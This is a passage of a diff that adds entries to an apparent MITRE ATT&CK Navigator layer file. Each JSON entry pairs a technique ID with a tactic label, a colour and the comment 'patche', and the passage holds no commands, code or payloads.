+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1218.013",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1213.005",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1578.005",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1578",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1666",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1112",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1112",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1601",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1685.003",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1218.005",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1218.007",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.006",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.006",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.006",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1111",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1090.003",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1480.002",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1003.003",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1564.004",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1557.001",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1557.001",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1106",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1599.001",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1599",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.004",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.004",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.004",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1059.008",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1602.002",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1686.002",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1584.008",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.008",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.008",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.008",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1590.006",
+            "tactic": "reconnaissance",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1046",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1070.005",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1040",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1040",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1590.004",
+            "tactic": "reconnaissance",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1095",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1132.002",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1571",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1027",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1218.008",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1137.001",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1036.011",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1134.004",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1134.004",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1550.002",
+            "tactic": "lateral-movement",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1550.003",
+            "tactic": "lateral-movement",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1110.002",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.002",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.002",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.002",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1110.001",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1601.001",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574.007",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574.007",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574.008",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574.008",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574.009",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574.009",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1120",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1566",
+            "tactic": "initial-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1598",
+            "tactic": "reconnaissance",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1647",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.003",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.003",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.003",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1677",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1027.014",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1205.001",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1205.001",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1205.001",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055.002",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055.002",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1059.001",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1542",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1542",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1690",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1552.004",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055.009",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055.009",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1564.010",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1057",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055.013",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055.013",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055.012",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055.012",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1572",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1001.003",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1090",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055.008",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055.008",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1216.001",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1059.006",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1682",
+            "tactic": "reconnaissance",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1012",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1542.004",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1542.004",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1600.001",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1620",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1547.001",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1547.001",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1218.009",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1218.010",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1070.010",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1219",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1074.002",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1021.001",
+            "tactic": "lateral-movement",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1219.002",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1114.002",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1018",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1036.003",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1564.009",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.005",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.005",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1556.005",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1578.004",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1036.002",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1207",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1014",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1564.006",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1218.011",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1134.005",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1134.005",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1553.003",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1021.002",
+            "tactic": "lateral-movement",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1021.004",
+            "tactic": "lateral-movement",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1098.004",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1098.004",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1027.017",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1688",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1595.001",
+            "tactic": "reconnaissance",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1053.005",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1053.005",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1053.005",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1053",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1053",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1053",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1113",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1593",
+            "tactic": "reconnaissance",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1003.002",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1518.001",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1679",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1583.004",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1584.004",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1569.002",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1489",
+            "tactic": "impact",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574.010",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574.010",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574.011",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574.011",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1548.001",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1213.002",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1684",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1585.001",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1205.002",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1205.002",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1205.002",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1592.002",
+            "tactic": "reconnaissance",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1072",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1072",
+            "tactic": "lateral-movement",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1518",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1027.002",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1036.006",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1566.001",
+            "tactic": "initial-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1598.003",
+            "tactic": "reconnaissance",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1566.002",
+            "tactic": "initial-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1598.004",
+            "tactic": "reconnaissance",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1566.004",
+            "tactic": "initial-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1132.001",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1528",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1539",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1558",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1027.003",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1027.008",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1553",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1548.003",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1573.001",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1216.002",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1218",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1497.001",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1497.001",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1542.001",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1542.001",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1082",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1614.001",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1614",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1016",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1049",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1033",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1216",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1007",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1529",
+            "tactic": "impact",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1124",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1543.002",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1543.002",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1548.006",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1542.005",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1542.005",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1221",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1548.005",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055.003",
